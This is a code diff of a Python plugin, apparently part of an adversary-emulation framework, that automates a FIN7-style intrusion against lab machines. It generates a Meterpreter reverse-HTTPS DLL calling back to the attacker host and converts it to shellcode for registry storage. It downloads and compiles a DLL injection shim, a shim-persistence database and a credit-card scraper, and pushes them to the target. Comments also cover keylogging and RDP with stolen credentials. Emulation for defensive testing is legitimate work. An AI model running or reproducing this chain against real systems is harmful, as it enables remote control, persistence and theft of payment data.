# deploy keylogger https://attack.mitre.org/techniques/T1056/001/
# deploy keylogger https://attack.mitre.org/techniques/T1056/001/
# create a RDP session from itadmin -> accounting using stolen credentials
# create a RDP session from itadmin -> accounting using stolen credentials
# TODO: Screen spying and keylogging are already implemented as standalone metasploit attacks. Use them
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKGREEN } End Step 8: User Monitoring { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKGREEN } End Step 8: User Monitoring { CommandlineColors . ENDC } " , 1 )
@ -417,13 +605,34 @@ class FIN7Plugin(AttackPlugin):
accounting = self . get_target_by_name ( " accounting " )
accounting = self . get_target_by_name ( " accounting " )
self . attacker_machine_plugin . remote_run ( " mkdir tool_factory/step_9 " )
self . attacker_machine_plugin . remote_run ( " mkdir tool_factory/step_9 " )
payload = " windows/meterpreter/reverse_https "
filename = " dll329.dll "
for_step = 9
architecture = " x86 "
target_platform = " windows "
lhost = self . attacker_machine_plugin . get_ip ( )
lport = " 53 "
sRDI_conversion = True
encoded_filename = " bin329.tmp "
logid = self . attack_logger . start_build ( architecture = architecture ,
target_platform = target_platform ,
payload = payload ,
lhost = lhost ,
lport = lport ,
filename = filename ,
for_step = for_step ,
sRDI_conversion = sRDI_conversion ,
encoded_filename = encoded_filename ,
comment = " And SRDI converted Meterpreter shell. Will be stored in the registry. " )
# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=53 -f dll -o payload.dll
# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=53 -f dll -o payload.dll
venom = MSFVenom ( self . attacker_machine_plugin , accounting , self . attack_logger )
venom = MSFVenom ( self . attacker_machine_plugin , accounting , self . attack_logger )
venom . generate_payload ( payload = " windows/meterpreter/reverse_https " ,
venom . generate_payload ( payload = payload ,
architecture = " x86 " ,
architecture = architecture ,
platform = " windows " ,
platform = target_platform ,
lhost = self . attacker_machine_plugin . get_ip ( ) ,
lhost = lhost ,
lport = " 53 " ,
lport = lport ,
format = " dll " ,
format = " dll " ,
outfile = " payload.dll " )
outfile = " payload.dll " )
@ -432,35 +641,65 @@ class FIN7Plugin(AttackPlugin):
self . attacker_machine_plugin . remote_run ( " cd tool_factory/; python3 sRDI/Python/ConvertToShellcode.py step_9/payload.dll " )
self . attacker_machine_plugin . remote_run ( " cd tool_factory/; python3 sRDI/Python/ConvertToShellcode.py step_9/payload.dll " )
# mv payload.bin bin329.tmp
# mv payload.bin bin329.tmp
self . attacker_machine_plugin . remote_run ( " cp tool_factory/step_9/payload.bin tool_factory/step_9/ bin329.tmp " )
self . attacker_machine_plugin . remote_run ( f " cp tool_factory/step_9/payload.bin tool_factory/step_9/ { encoded_filename } " )
# This will be stored in the registry
# This will be stored in the registry
self . attack_logger . stop_build ( logid = logid )
# ## DLL 329
# ## DLL 329
# Build https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/fin7/Resources/Step9/InjectDLL-Shim
# Build https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/fin7/Resources/Step9/InjectDLL-Shim
dl_uris = [ " https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step9/InjectDLL-Shim/dllmain.cpp " ,
" https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step9/InjectDLL-Shim/pe.cpp " ,
" https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step9/InjectDLL-Shim/pe.h " ]
filename = " dll329.dll "
for_step = 9
logid = self . attack_logger . start_build ( dl_uris = dl_uris ,
filename = filename ,
for_step = for_step ,
comment = " Will be injected into the AccoutingIQ executable. " )
self . attacker_machine_plugin . remote_run (
self . attacker_machine_plugin . remote_run (
" cd tool_factory/step_9; rm dllmain.cpp " )
" cd tool_factory/step_9; rm dllmain.cpp " )
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_9; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step9/InjectDLL-Shim/dllmain.cpp " )
self . attacker_machine_plugin . remote_run ( f" cd tool_factory/step_9; wget { dl_uris [ 0 ] } " )
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_9; rm pe.cpp; " )
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_9; rm pe.cpp; " )
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_9; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step9/InjectDLL-Shim/pe.cpp " )
self . attacker_machine_plugin . remote_run ( f" cd tool_factory/step_9; wget { dl_uris [ 1 ] } " )
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_9; rm pe.h; " )
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_9; rm pe.h; " )
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_9; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step9/InjectDLL-Shim/pe.h " )
self . attacker_machine_plugin . remote_run ( f" cd tool_factory/step_9; wget { dl_uris [ 2 ] } " )
# Compiling dll 329
# Compiling dll 329
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_9; rm dll329.dll; " )
self . attacker_machine_plugin . remote_run ( f " cd tool_factory/step_9; rm { filename } ; " )
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_9; i686-w64-mingw32-g++ -m32 -shared -municode -D UNICODE -D _UNICODE -fpermissive dllmain.cpp pe.cpp -L/usr/i686-w64-mingw32/lib/ -l:libntoskrnl.a -l:libntdll.a -o dll329.dll " )
self . attacker_machine_plugin . remote_run ( f " cd tool_factory/step_9; i686-w64-mingw32-g++ -m32 -shared -municode -D UNICODE -D _UNICODE -fpermissive dllmain.cpp pe.cpp -L/usr/i686-w64-mingw32/lib/ -l:libntoskrnl.a -l:libntdll.a -o { filename } " )
self . attack_logger . stop_build ( logid = logid )
# ## sdbE376.tmp
# ## sdbE376.tmp
dl_uri = " https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/fin7/Resources/Step9/sdbE376.tmp "
filename = " sdbE376.tmp "
logid = self . attack_logger . start_build ( dl_uri = dl_uri ,
filename = filename ,
for_step = 9 ,
comment = " An SDB Shim database file. Will be installed for application shimming. " )
# Just download https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/fin7/Resources/Step9/sdbE376.tmp
# Just download https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/fin7/Resources/Step9/sdbE376.tmp
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_9; rm sdbE376.tmp " )
self . attacker_machine_plugin . remote_run ( f " cd tool_factory/step_9; rm { filename } " )
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_9; wget https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/fin7/Resources/Step9/sdbE376.tmp " )
self . attacker_machine_plugin . remote_run ( f " cd tool_factory/step_9; wget { dl_uri } " )
self . attack_logger . stop_build ( logid = logid )
self . attack_logger . vprint ( f " { CommandlineColors . OKGREEN } Step 9 compiling tools { CommandlineColors . ENDC } " , 1 )
self . attack_logger . vprint ( f " { CommandlineColors . OKGREEN } Step 9 compiling tools { CommandlineColors . ENDC } " , 1 )
def step9 ( self ) :
def step9 ( self ) :
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKBLUE } Step 9 (target: accounting): Setup Shim Persistence { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKBLUE } Step 9 (target: accounting): Setup Shim Persistence { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration (
" Step 9 (target accounting): Setup Shim Persistence \n ---------------------------- " )
self . attack_logger . start_narration ( """
NOT IMPLEMENTED YET
* powershell . exe executes base64 encoded commands ( Caldera ? )
* Downloads dll329 . dll and sdbE376
* persistence : sdbinst . exe installs sdbE376 . tmp for application shimming https : / / attack . mitre . org / techniques / T1546 / 011 /
""" )
# This is meterpreter !
# This is meterpreter !
@ -480,6 +719,8 @@ class FIN7Plugin(AttackPlugin):
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKBLUE } Step 10 compiling tools { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKBLUE } Step 10 compiling tools { CommandlineColors . ENDC } " , 1 )
accounting = self . get_target_by_name ( " accounting " )
# Compiling
# Compiling
# i686-w64-mingw32-gcc is for 32 bit
# i686-w64-mingw32-gcc is for 32 bit
@ -487,33 +728,50 @@ class FIN7Plugin(AttackPlugin):
# Important: pillowMint is not very complex and looks for the data at a fixed address. As we a re-compiling AccountIQ.exe and the data address does not match the expected one we will just get garbage.
# Important: pillowMint is not very complex and looks for the data at a fixed address. As we a re-compiling AccountIQ.exe and the data address does not match the expected one we will just get garbage.
filename = " AccountingIQ.exe "
dl_uri = " https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step10/AccountingIQ.c "
logid = self . attack_logger . start_build (
filename = filename ,
for_step = 10 ,
dl_uri = dl_uri ,
comment = " This is a simulated credit card tool to target. The final flag is in here. " )
# simulated credit card tool as target
# simulated credit card tool as target
self . attacker_machine_plugin . remote_run ( " mkdir tool_factory/step_10 " ) # MSFVenom needs to be installed
self . attacker_machine_plugin . remote_run ( " mkdir tool_factory/step_10 " ) # MSFVenom needs to be installed
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_10; rm AccountingIQ.exe " )
self . attacker_machine_plugin . remote_run ( f" cd tool_factory/step_10; rm { filename } " )
self . attacker_machine_plugin . remote_run (
self . attacker_machine_plugin . remote_run (
" cd tool_factory/step_10; rm AccountingIQ.c; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step10/AccountingIQ.c " )
" cd tool_factory/step_10; rm AccountingIQ.c; wget {dl_uri} " )
self . attacker_machine_plugin . remote_run (
self . attacker_machine_plugin . remote_run (
" cd tool_factory/step_10; i686-w64-mingw32-gcc -m32 -L/usr/i686-w64-mingw32/lib -I/usr/i686-w64-mingw32/include AccountingIQ.c -o AccountingIQ.exe " )
f " cd tool_factory/step_10; i686-w64-mingw32-gcc -m32 -L/usr/i686-w64-mingw32/lib -I/usr/i686-w64-mingw32/include AccountingIQ.c -o { filename } " )
self . attacker_machine_plugin . get ( " tool_factory/step_10/AccountingIQ.exe " ,
self . attacker_machine_plugin . get ( f" tool_factory/step_10/ { filename } " ,
os . path . join ( os . path . dirname ( self . plugin_path ) , " resources " , " step10 " ,
os . path . join ( os . path . dirname ( self . plugin_path ) , " resources " , " step10 " ,
" AccountingIQ.exe " ) )
filename ) )
accounting . put ( os . path . join ( os . path . dirname ( self . plugin_path ) , " resources " , " step10 " , filename ) ,
filename )
self . attack_logger . stop_build ( logid = logid )
# Simulated credit card scraper
# Simulated credit card scraper
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_10; rm pillowMint.exe " )
filename = " pillowMint.exe "
dl_uri = " https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step10/pillowMint.cpp "
logid = self . attack_logger . start_build (
filename = filename ,
for_step = 10 ,
dl_uri = dl_uri ,
comment = " This is a simulated credit card data scraper. " )
self . attacker_machine_plugin . remote_run ( f " cd tool_factory/step_10; rm { filename } " )
self . attacker_machine_plugin . remote_run (
self . attacker_machine_plugin . remote_run (
" cd tool_factory/step_10; rm pillowMint.cpp; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step10/pillowMint.cpp " )
f " cd tool_factory/step_10; rm pillowMint.cpp; wget { dl_uri } " )
self . attacker_machine_plugin . remote_run (
self . attacker_machine_plugin . remote_run (
" cd tool_factory/step_10; x86_64-w64-mingw32-g++ -static pillowMint.cpp -o pillowMint.exe " )
f " cd tool_factory/step_10; x86_64-w64-mingw32-g++ -static pillowMint.cpp -o { filename } " )
self . attacker_machine_plugin . get ( " tool_factory/step_10/pillowMint.exe " ,
self . attacker_machine_plugin . get ( f" tool_factory/step_10/ { filename } " ,
os . path . join ( os . path . dirname ( self . plugin_path ) , " resources " , " step10 " ,
os . path . join ( os . path . dirname ( self . plugin_path ) , " resources " , " step10 " ,
" pillowMint.exe " ) )
filename ) )
accounting = self . get_target_by_name ( " accounting " )
accounting . put ( os . path . join ( os . path . dirname ( self . plugin_path ) , " resources " , " step10 " , filename ) ,
accounting . put ( os . path . join ( os . path . dirname ( self . plugin_path ) , " resources " , " step10 " , " pillowMint.exe " ) ,
filename )
" pillowMint.exe " )
self . attack_logger . stop_build ( logid = logid )
accounting . put ( os . path . join ( os . path . dirname ( self . plugin_path ) , " resources " , " step10 " , " AccountingIQ.exe " ) ,
" AccountingIQ.exe " )
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKGREEN } Step 10 compiling tools { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKGREEN } Step 10 compiling tools { CommandlineColors . ENDC } " , 1 )
@ -524,6 +782,17 @@ class FIN7Plugin(AttackPlugin):
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKBLUE } Step 10 (target: accounting): Steal Payment Data { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKBLUE } Step 10 (target: accounting): Steal Payment Data { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration (
" Step 10 (target accounting): Steal Payment Data \n ---------------------------- " )
self . attack_logger . start_narration ( """
NOT IMPLEMENTED YET . NEEDS TARGET REBOOTING : NO IDEA IF ATTACKX CAN SUPPORT THAT
* Machine is rebooted
* shim dll329 . dll is activated https : / / attack . mitre . org / techniques / T1546 / 011 /
* AccountingIQ injects into SyncHost . exe , rundll32 . exe communicates to C2
* debug . exe ( pillowMint . exe ) is downloaded from C2 , does process discovery https : / / attack . mitre . org / techniques / T1105 /
* send 7 za . exe to target . Zip stolen data , exfiltrate
""" )
# This is meterpreter !
# This is meterpreter !
@ -567,7 +836,7 @@ class FIN7Plugin(AttackPlugin):
# Those build calls will be called from the steps directly. But it is always conveniet for testing to use that now directly while developing
# Those build calls will be called from the steps directly. But it is always conveniet for testing to use that now directly while developing
# Building the tools is temporarily de-activated. Without the proper environment the tools being built are useless. Many attacks run on temporary attacks
# Building the tools is temporarily de-activated. Without the proper environment the tools being built are useless. Many attacks run on temporary attacks
if Fals e:
if Tru e:
self . build_step4 ( ) # DONE
self . build_step4 ( ) # DONE
self . build_step6 ( ) # DONE
self . build_step6 ( ) # DONE
# TODO: self.build_step7() # Will not be done until the environment is planned. This step needs Aloha Command Center on the target. Maybe we write our own vulnerable app....
# TODO: self.build_step7() # Will not be done until the environment is planned. This step needs Aloha Command Center on the target. Maybe we write our own vulnerable app....
@ -576,15 +845,15 @@ class FIN7Plugin(AttackPlugin):
self . build_step10 ( ) # DONE
self . build_step10 ( ) # DONE
# self.step1( )
self . step1 ( )
# self.step2( )
self . step2 ( )
self . step3 ( ) # DONE and works
self . step3 ( ) # DONE and works
self . step4 ( ) # PARTIAL - with a hack. Needs compilation of babymetal: Needs a powershell to execute on the build system. And this one needs system access
self . step4 ( ) # PARTIAL - with a hack. Needs compilation of babymetal: Needs a powershell to execute on the build system. And this one needs system access
self . step5 ( ) # DONE and quite ok
self . step5 ( ) # DONE and quite ok
# self.step6() # Hollow.exe has to be generated
self . step6 ( ) # Hollow.exe has to be generated
# self.step7() # Will need compilation of an attack tool Boostwrite
self . step7 ( ) # Will need compilation of an attack tool Boostwrite
# self.step8() # Migration and credential collection, on itadmin
self . step8 ( ) # Migration and credential collection, on itadmin
# self.step9() # on accounting, shim persistence bin329.tmp needs to be generated
self . step9 ( ) # on accounting, shim persistence bin329.tmp needs to be generated
# self.step10() # on accounting, AccountingIQ.c needs compilation. But just once.
self . step10 ( ) # on accounting, AccountingIQ.c needs compilation. But just once.
return " "
return " "